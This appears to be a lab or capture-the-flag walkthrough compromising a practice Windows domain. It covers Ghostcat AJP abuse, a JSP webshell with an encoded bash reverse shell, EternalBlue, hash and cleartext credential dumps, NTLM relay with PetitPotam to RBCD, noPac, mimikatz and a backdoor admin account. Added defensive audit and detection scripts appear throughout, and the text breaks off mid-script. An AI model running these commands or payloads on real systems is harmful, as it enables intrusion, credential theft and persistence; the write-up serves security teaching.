First, a look at the topics this lab covers.

Information gathering. Start with an fscan scan:
```
fscan.exe -h 39.98.116.168

fscan version: 1.8.3
start infoscan
39.98.116.168:8080 open
39.98.116.168:22 open
39.98.116.168:8009 open
[*] alive ports len is: 3
start vulscan
已完成 3/3
[*] 扫描结束,耗时: 11.0582457s
```
8080 and 8009 are open. 8080 first: it is an admin backend.

Next, brute-force the directories on it:
```
python3 dirsearch.py -u http://39.98.116.168:8080/

Target: http://39.98.116.168:8080/

[09:35:33] Starting:
[09:35:33] 302 - 0B   - /js  ->  /js/
[09:35:40] 200 - 114B - /404.html
[09:35:40] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[09:35:41] 400 - 795B - /a%5c.aspx
[09:35:55] 200 - 7KB  - /console.html
[09:35:56] 302 - 0B   - /css  ->  /css/
[09:35:56] 302 - 0B   - /data  ->  /data/
[09:35:58] 302 - 0B   - /docs  ->  /docs/
[09:35:58] 404 - 732B - /docs/CHANGELOG.html
[09:35:58] 404 - 733B - /docs/export-demo.xml
[09:35:58] 404 - 729B - /docs/_build/
[09:35:58] 404 - 731B - /docs/changelog.txt
[09:35:58] 404 - 749B - /docs/html/admin/ch01s04.html
[09:35:58] 404 - 747B - /docs/html/admin/index.html
[09:35:58] 404 - 750B - /docs/html/developer/ch02.html
[09:35:58] 404 - 733B - /docs/maintenance.txt
[09:35:58] 404 - 730B - /docs/swagger.json
[09:35:58] 404 - 749B - /docs/html/admin/ch03s07.html
[09:35:58] 404 - 753B - /docs/html/developer/ch03s15.html
[09:35:58] 404 - 737B - /docs/html/index.html
[09:35:58] 200 - 17KB - /docs/
[09:35:58] 404 - 746B - /docs/html/admin/ch01.html
[09:35:58] 404 - 730B - /docs/updating.txt
[09:35:58] 200 - 132B - /download/
[09:35:58] 302 - 0B   - /download  ->  /download/
[09:36:00] 302 - 0B   - /examples  ->  /examples/
[09:36:00] 404 - 781B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[09:36:00] 200 - 1KB  - /examples/
[09:36:00] 200 - 6KB  - /examples/servlets/index.html
[09:36:00] 200 - 14KB - /examples/jsp/index.html
[09:36:00] 200 - 658B - /examples/servlets/servlet/CookieExample
[09:36:00] 404 - 746B - /examples/servlet/SnoopServlet
[09:36:00] 200 - 1KB  - /examples/websocket/index.xhtml
[09:36:00] 200 - 1KB  - /examples/servlets/servlet/RequestHeaderExample
[09:36:01] 200 - 685B - /examples/jsp/snp/snoop.jsp
[09:36:03] 403 - 3KB  - /host-manager/html
[09:36:03] 403 - 3KB  - /host-manager/
[09:36:04] 302 - 0B   - /images  ->  /images/
[09:36:07] 302 - 0B   - /lib  ->  /lib/
[09:36:09] 302 - 0B   - /manager  ->  /manager/
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[09:36:09] 403 - 3KB  - /manager/login
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[09:36:09] 403 - 3KB  - /manager/html/
[09:36:09] 403 - 3KB  - /manager/admin.asp
[09:36:09] 403 - 3KB  - /manager/login.asp
[09:36:09] 403 - 3KB  - /manager/VERSION
[09:36:09] 403 - 3KB  - /manager/
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[09:36:09] 403 - 3KB  - /manager/jmxproxy
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[09:36:09] 403 - 3KB  - /manager/status/all
[09:36:09] 403 - 3KB  - /manager/html
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?qry=STUFF
[09:36:09] 403 - 3KB  - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[09:36:29] 403 - 0B   - /upload
[09:36:29] 403 - 0B   - /upload/1.php
[09:36:29] 403 - 0B   - /upload/2.php
[09:36:29] 403 - 0B   - /upload/loginIxje.php
[09:36:29] 403 - 0B   - /upload/test.txt
[09:36:29] 403 - 0B   - /upload/
[09:36:29] 403 - 0B   - /upload/b_user.xls
[09:36:29] 403 - 0B   - /upload/b_user.csv
[09:36:29] 403 - 0B   - /upload/upload.php
[09:36:29] 403 - 0B   - /upload/test.php
[09:36:29] 200 - 9KB  - /user.html
```
The Tomcat version number is disclosed.

CVE-2020-1983, the Tomcat file inclusion vulnerability (Ghostcat): https://github.com/00theway/Ghostcat-CNVD-2020-10487
```
python3 ajpShooter.py http://39.98.116.168:8080 8009 /WEB-INF/web.xml read

00theway,just for test

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>

  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>

  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>
  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>

  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>
```
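The web.xml above is worth reading from the defender's side: the only security-constraint covers `/upload/*`, so direct HTTP access to stored files needs the admin role, but none of the servlet mappings (including the upload endpoint itself) sit behind any constraint. The following audit script is an added example and is not code from the write-up or from the Ghostcat tool; it parses a web.xml, applies servlet-spec url-pattern matching, and reports which mapped paths can be reached without a role. The embedded XML is the target's web.xml trimmed to the elements the audit needs (DOCTYPE and display-name entries dropped).

```python
import xml.etree.ElementTree as ET

# web.xml recovered from the target above, trimmed to the elements the
# audit uses (DOCTYPE, error-page and display-name entries omitted).
WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
  <servlet-mapping><servlet-name>HelloServlet</servlet-name><url-pattern>/HelloServlet</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>LoginServlet</servlet-name><url-pattern>/LoginServlet</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>RegisterServlet</servlet-name><url-pattern>/RegisterServlet</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>UploadTestServlet</servlet-name><url-pattern>/UploadServlet</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>DownloadFileServlet</servlet-name><url-pattern>/DownloadServlet</url-pattern></servlet-mapping>
</web-app>"""


def pattern_matches(pattern: str, path: str) -> bool:
    """Servlet-spec url-pattern matching: exact match, path prefix '/dir/*',
    or extension '*.ext'."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern


def constraints(root):
    """Yield (url-pattern, roles) for every security-constraint.
    No auth-constraint element means the pattern is public ([]); an
    auth-constraint with no role-name denies everyone, reported as '(nobody)'."""
    for sc in root.findall("security-constraint"):
        auth = sc.find("auth-constraint")
        if auth is None:
            roles = []
        else:
            roles = [r.text.strip() for r in auth.findall("role-name")] or ["(nobody)"]
        for up in sc.findall("web-resource-collection/url-pattern"):
            yield up.text.strip(), roles


def audit_web_xml(xml_text: str) -> dict:
    """Map each servlet-mapping path to the roles allowed to call it.
    An empty role list means the path is reachable anonymously."""
    root = ET.fromstring(xml_text)
    protected = list(constraints(root))
    report = {}
    for sm in root.findall("servlet-mapping"):
        name = sm.findtext("servlet-name").strip()
        for up in sm.findall("url-pattern"):
            path = up.text.strip()
            roles = sorted({r for pat, rs in protected
                            if pattern_matches(pat, path) for r in rs})
            report[path] = {"servlet": name, "roles": roles}
    return report


def unauthenticated_paths(report: dict) -> list:
    """Paths no security-constraint applies to, sorted for stable output."""
    return sorted(p for p, info in report.items() if not info["roles"])


if __name__ == "__main__":
    rep = audit_web_xml(WEB_XML)
    for path in unauthenticated_paths(rep):
        print(f"{path:<20} {rep[path]['servlet']}  (no auth-constraint)")
```

Run against this web.xml, every servlet path comes back unauthenticated, which is exactly the gap the upload step below exploits; protecting the storage directory while leaving the upload servlet open only hides the stored file from HTTP, and the AJP file include route does not pass through the security-constraint at all.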
Save the url-patterns as a wordlist:
```bash
python3 ajpShooter.py http://39.98.107.181:8080 8009 /WEB-INF/web.xml read | grep url-pattern | awk -F '>' '{print $2}' | awk -F '<' '{print $1}' > web-xml.dict
```
Fuzzing:
```
ffuf -c -w web-xml.dict -u http://39.98.107.181:8080FUZZ

        v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://39.98.107.181:8080FUZZ
 :: Wordlist         : FUZZ: /root/yst/Ghostcat-CNVD-2020-10487-master/web-xml.dict
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

/upload/*               [Status: 403, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
/RegisterServlet        [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 53ms]
/LoginServlet           [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 53ms]
/DownloadServlet        [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
/UploadServlet          [Status: 200, Size: 682, Words: 145, Lines: 24, Duration: 58ms]
/HelloServlet           [Status: 200, Size: 21, Words: 2, Lines: 2, Duration: 58ms]
:: Progress: [6/6] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```
Test the upload endpoint by uploading a JSP shell:
```jsp
<%
    // run the command and stream its output back into the response
    java.io.InputStream in = Runtime.getRuntime()
        .exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgveHh4IDA+JjE=}|{base64,-d}|{bash,-i}")
        .getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
        // only the bytes actually read this round, not the whole buffer
        out.println(new String(b, 0, a));
    }
    out.print("</pre>");
%>
```
The response returns the stored path: ./upload/4332ca5e87df3ffe57f09321848a920a/20250326010633582.txt

Start a listener on the VPS, then include the uploaded file through AJP:
```
python3 ajpShooter.py http://39.98.116.168:8080/ 8009 /upload/4332ca5e87df3ffe57f09321848a920a/20250326010633582.txt eval

00theway,just for test
```
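The whole AJP route above, reading web.xml and then including the uploaded file, depends on one server-side misconfiguration: an AJP connector reachable from the network with no shared secret. As an added example (not from the write-up, the Ghostcat tool or Tomcat itself), here is a small audit of a Tomcat server.xml that flags AJP connectors not bound to loopback or lacking a secret. Both server.xml fragments are constructed for the example; the `secret` value is a placeholder. Since Tomcat 9.0.31 / 8.5.51 / 7.0.100 the shipped AJP connector is commented out, defaults `address` to loopback and requires a secret (`secretRequired="true"`), so the weak fragment mirrors the pre-change defaults that Ghostcat relied on.

```python
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed server.xml fragments, not the target's configuration.
# Weak: the stock AJP connector from older Tomcat releases, bound to all
# interfaces and accepting any AJP client.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Hardened: loopback only, secret required, placeholder secret value.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET"
               redirectPort="8443"/>
  </Service>
</Server>"""


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding string per weakness on each AJP connector.
    An empty list means every AJP connector is loopback-bound with a secret."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        proto = conn.get("protocol", "HTTP/1.1")
        if not proto.upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None:
            findings.append(f"AJP:{port} has no explicit address "
                            "(older releases bind all interfaces)")
        elif address not in LOOPBACK:
            findings.append(f"AJP:{port} bound to {address}, reachable from the network")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f"AJP:{port} secretRequired=false: any client may speak AJP")
        elif not conn.get("secret"):
            findings.append(f"AJP:{port} has no secret configured")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml_text) or ["ok"])
```

If nothing in front of Tomcat actually speaks AJP (no Apache httpd with mod_jk/mod_proxy_ajp), the right fix is to delete the connector rather than harden it; the audit treats a present-but-hardened connector as acceptable only because the example cannot know which reverse proxy sits in front.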
Look for the flag file:
```bash
find / -type f -name '*flag*' 2>/dev/null
```
Write in an SSH public key to keep access:
```bash
# on your own machine
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub

# in the reverse shell
echo "<contents of ~/.ssh/id_rsa.pub>" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

ssh -i ~/.ssh/id_rsa root@39.99.140.174
```
Internal network. Bring up a proxy and scan:
```
./fscan -h 172.22.11.0/24

fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.6  is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.26:135 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:22 open
172.22.11.6:88 open
172.22.11.76:8080 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetInfo
[*]172.22.11.26
   [->]XR-LCM3AE8B
   [->]172.22.11.26
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo
[*]172.22.11.6
   [->]XIAORANG-DC
   [->]172.22.11.6
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 8.210849878s
```
Analysis:

```
172.22.11.45  XR-Desktop.xiaorang.lab
172.22.11.6   xiaorang-dc.xiaorang.lab
172.22.11.26  XR-LCM3AE8B.xiaorang.lab
172.22.11.76  this host (the foothold)
```
EternalBlue. .45 was flagged MS17-010 by the scan:
```
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.11.45
exploit
```
The flag is in the admin user's directory.

Dump the hashes:
```
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  37fd17d6c6653c4e65093e33f50f7d3d  e774d3db0995fc0b8469093eb208aa7ece5abb9f
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================
Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  78 3f 3f 97 ea 43 e5 10 7e f8 16 06 4a 55 3d 95 51 a3 5b 02 6a a3 7b 76 c9 b3 34 88 d5 eb 8c 98 74 c1 4e 10 2b 13 b4 49 54 ff c2 b1 3d 56 0c ce 6b 40 29 4c 83 d1 3d c9 dd 11 87 68 03 54 9f cc f7 c9 ce 53 1d 34 de 90 13 b9 a7 72 09 b7 bd 87 dc a6 cb 5e 77 a7 43 0e fe a1 ac 9b db 91 db 38 92 be e9 d5 cf 1a d2 33 08 e7 94 04 ac 9a 7a 1b df 73 0d ee b2 db fd 43 ca 97 ff 6b 2e 1e c0 d4 03 73 56 56 f6 59 7c b7 6b 4e 0d df 54 3f 4f 85 df a8 05 39 22 f3 84 ad 90 d3 a7 b6 52 55 d1 4f 89 02 5d 78 91 b1 f2 4b a5 8d aa 73 34 6e d0 17 7c 2d a4 57 21 f3 40 a7 b5 3a 87 a5 c3 fc 99 87 6a 72 22 b3 83 49 b9 1b b6 79 68 a5 83 6d 49 5f 71 c2 dd 2d da 19 c9 ff 22 2c ce e3 96 e7 68 0d 42 1c 84 e4 68 8f ce 80 c7 76 aa 44 9e c4 e8 85
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================
Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  78 3f 3f 97 ea 43 e5 10 7e f8 16 06 4a 55 3d 95 51 a3 5b 02 6a a3 7b 76 c9 b3 34 88 d5 eb 8c 98 74 c1 4e 10 2b 13 b4 49 54 ff c2 b1 3d 56 0c ce 6b 40 29 4c 83 d1 3d c9 dd 11 87 68 03 54 9f cc f7 c9 ce 53 1d 34 de 90 13 b9 a7 72 09 b7 bd 87 dc a6 cb 5e 77 a7 43 0e fe a1 ac 9b db 91 db 38 92 be e9 d5 cf 1a d2 33 08 e7 94 04 ac 9a 7a 1b df 73 0d ee b2 db fd 43 ca 97 ff 6b 2e 1e c0 d4 03 73 56 56 f6 59 7c b7 6b 4e 0d df 54 3f 4f 85 df a8 05 39 22 f3 84 ad 90 d3 a7 b6 52 55 d1 4f 89 02 5d 78 91 b1 f2 4b a5 8d aa 73 34 6e d0 17 7c 2d a4 57 21 f3 40 a7 b5 3a 87 a5 c3 fc 99 87 6a 72 22 b3 83 49 b9 1b b6 79 68 a5 83 6d 49 5f 71 c2 dd 2d da 19 c9 ff 22 2c ce e3 96 e7 68 0d 42 1c 84 e4 68 8f ce 80 c7 76 aa 44 9e c4 e8 85
xr-desktop$  XIAORANG.LAB  (null)
yangmei      XIAORANG.LAB  xrihGHgoNZQ
```
hashdump
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
Next, collect domain information. Several tools would do here; we go with the yangmei account and first add it to the local Administrators group:
```bash
proxychains4 python3 psexec.py Administrator@172.22.11.45 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk
```

```
net localgroup administrators yangmei /add
```
Domain information collection:
```bash
proxychains4 bloodhound-python -u yangmei -p xrihGHgoNZQ -d XIAORANG.LAB --dns-tcp -ns 172.22.11.6 -c all --zip
```
Analysis:

1. Sprayed the usernames collected by BloodHound against the passwords/hashes obtained so far; no new users found.
2. MAQ = 0, so no computer account can be added.
3. LDAP has no TLS, so a computer cannot be added remotely either. impacket's addcomputer has two methods, samr and ldaps: samr is blocked by MAQ = 0, ldaps by the missing TLS plus MAQ = 0.
4. The DC is vulnerable to noPac, but noPac with the current user yangmei did not work, and yangmei has no CreateChild ACL on the domain's Computers container.
5. The DC is vulnerable to noPac, but yangmei has no WriteDacl on the current Windows machine xr-desktop, so its SamAccountName cannot be changed.
6. DFSCoerce and PetitPotam are both present in the domain, but CVE-2019-1040 is not, so DFSCoerce is dropped in favour of PetitPotam.
7. NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
Scan for WebClient and PetitPotam:
```bash
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
```
Reference: https://forum.butian.net/share/1944. PetitPotam lets us force a target server or user to authenticate to our server with its LM/NTLM hash, and that authentication can then be relayed to other servers for lateral movement, privilege escalation and so on; here only 172.22.11.26 is PetitPotam-vulnerable. Relaying NTLM through WebDAV has the advantage of not being affected by protocol signing, and the WebClient automatically authenticates with the current user's credentials over NTLM to local intranet or trusted sites.

We use the no-ADCS approach of PetitPotam + NTLM relay. The idea: trigger PetitPotam against a target that is vulnerable and has the WebClient service running, so that the target is coerced into accessing our HTTP relay; the target's WebClient will carry NTLM authentication to our relay, which relays it to LDAP and obtains the machine account's identity. As that machine account we then modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, configuring RBCD on XR-LCM3AE8B.xiaorang.lab.

There is one condition: traffic reaching the server's port 80 has to be forwarded to the client's local port 80, but an SSH reverse forward (-R) only listens on 127.0.0.1 because sshd's GatewayPorts option is off by default. So we have socat take traffic on 0.0.0.0:80 and pass it to 127.0.0.1:79, and the reverse forward carries 79 back to the client's local 80, effectively making 80 listen on 0.0.0.0.
```bash
ssh -i ~/.ssh/id_rsa root@39.98.107.181 -D <socks-proxy-ip>:<port> -R \*:79:127.0.0.1:80
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
```
What the pieces do:

- ssh: connect to the remote server over SSH.
- -i ~/.ssh/id_rsa: authenticate with the private key id_rsa.
- root@39.99.139.181: connect to 39.99.139.181 as root.
- -D socksip:port: -D starts a SOCKS proxy, i.e. a dynamic port forward listening on socksip:port locally. Everything sent through this proxy goes out via the 39.99.139.181 server, like a SOCKS5 tunnelling proxy.
- -R \*:79:127.0.0.1:80: -R is remote port forwarding. \* asks to bind all interfaces (let any IP reach the port). 79:127.0.0.1:80 means port 79 on the remote server (39.99.139.181) is forwarded to 127.0.0.1:80 on the local machine (where the SSH client runs).
- socat: a general-purpose networking tool, commonly used for port forwarding and proxying.
- TCP-LISTEN:80,fork,bind=0.0.0.0: TCP-LISTEN:80 listens on local port 80 for TCP connections; fork spawns a child process per new connection (so one connection does not block the rest); bind=0.0.0.0 listens on all addresses (external and local).
- TCP:localhost:79: each connection received on port 80 is forwarded to localhost:79.
The forwarding works: a curl to 172.22.11.76 from inside the network lands on our local Kali box.
```bash
nc -lvvp 80
proxychains curl http://172.22.11.76:80
```
Relay via WebDAV + PetitPotam coerced authentication. Next, start ntlmrelayx locally, using the XR-Desktop machine account compromised earlier as the account granted RBCD, then use PetitPotam to trigger XR-LCM3AE8B into authenticating to 172.22.11.76.
```bash
proxychains python3 ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

# then fire PetitPotam to force the authentication
proxychains python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26
```
Resource-based constrained delegation. With RBCD configured, use the XR-DESKTOP$ machine-account hash dumped earlier on 172.22.11.45 to abuse the RBCD on 172.22.11.26 and obtain a silver ticket.

Rename the resulting ccache file, then:
```bash
proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :37fd17d6c6653c4e65093e33f50f7d3d xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

export KRB5CCNAME=administrator.ccache

sudo vim /etc/hosts   # add the IP of XR-LCM3AE8B.xiaorang.lab to hosts
172.22.11.26 XR-LCM3AE8B.xiaorang.lab
```
With the ccache imported, connect without a password:
```bash
proxychains python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
```
flag{681cae09-6e26-4714-87d8-e1e52d014bcc}
noPac. Add a backdoor user for RDP:
```
net user calmsec admin@123 /add
net localgroup administrators calmsec /add
```
RDP to .26. On logging in another user turns out to be logged on, so upload mimikatz and dump hashes:
```powershell
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt
```
After adding the admin account and RDPing in, mimikatz yields the hash of the user zhanghui, 1232126b24cdf8c9bd2f788a9d7c7ed1. zhanghui is in the MA_Admin group and can create objects under the Computers container, i.e. can add machine accounts to the domain, so noPac works with this account.
https://github.com/Ridter/noPac
```bash
proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
```
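Both domain-side steps in this write-up, the relayed RBCD write on XR-LCM3AE8B and the noPac computer-create-and-rename, leave distinctive traces in the domain controller's Security log. The following detection logic is an added example and is not code from the write-up, impacket or noPac. It assumes Directory Service Changes auditing is enabled with a SACL on computer objects (so that 5136 is generated for attribute writes) and that 4741/4742 computer-account auditing is on; the event records are constructed dicts using the Security-log field names, with every value made up for the example. For the relay case the tell is that the subject of the 5136 is itself a machine account writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own object; for noPac it is a 4742 whose new sAMAccountName loses its trailing `$` or matches a DC's name, shortly after a 4741 by the same user.

```python
# Constructed Security-log records (dict form) for the two AD manipulations
# in this write-up. Field names follow the Windows Security event schema for
# 5136 (directory service object modified) and 4741/4742 (computer account
# created/changed); the values are made up for the example.
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"          # OperationType 'Value Added' in event 5136
DOMAIN_CONTROLLERS = {"XIAORANG-DC"}

EVENTS = [
    # relay: the coerced computer writes its own delegation attribute
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    # benign attribute change on the same object, should not fire
    {"EventID": 5136, "SubjectUserName": "svc-deploy",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    # noPac: a fresh computer is created, then renamed to the DC's name
    {"EventID": 4741, "SubjectUserName": "zhanghui", "TargetUserName": "WKS-TEMP$"},
    {"EventID": 4742, "SubjectUserName": "zhanghui", "TargetUserName": "WKS-TEMP$",
     "SamAccountName": "XIAORANG-DC"},
    # ordinary 4742 with the name unchanged ('-'), should not fire
    {"EventID": 4742, "SubjectUserName": "helpdesk", "TargetUserName": "XR-DESKTOP$",
     "SamAccountName": "-"},
]


def rbcd_attribute_writes(events):
    """5136 records that add a value to msDS-AllowedToActOnBehalfOfOtherIdentity.
    A machine account as the subject (name ends in '$') is the relay signature:
    the coerced computer was made to write its own delegation attribute."""
    out = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        if e.get("OperationType") != VALUE_ADDED:
            continue
        subject = e["SubjectUserName"]
        out.append({"object": e["ObjectDN"], "subject": subject,
                    "self_write_by_machine": subject.endswith("$")})
    return out


def nopac_renames(events, dc_names):
    """4742 records whose new sAMAccountName drops the trailing '$' or collides
    with a domain controller's name. A preceding 4741 for the same account by the
    same user marks it as a freshly created computer (the noPac pattern)."""
    created = {(e["SubjectUserName"], e["TargetUserName"])
               for e in events if e.get("EventID") == 4741}
    out = []
    for e in events:
        if e.get("EventID") != 4742:
            continue
        new = e.get("SamAccountName", "-")
        if new == "-":
            continue                       # sAMAccountName not part of this change
        if not new.endswith("$") or new.rstrip("$").upper() in dc_names:
            key = (e["SubjectUserName"], e["TargetUserName"])
            out.append({"account": e["TargetUserName"], "new_name": new,
                        "subject": e["SubjectUserName"],
                        "created_by_same_user": key in created})
    return out


if __name__ == "__main__":
    for hit in rbcd_attribute_writes(EVENTS):
        print("RBCD write:", hit)
    for hit in nopac_renames(EVENTS, DOMAIN_CONTROLLERS):
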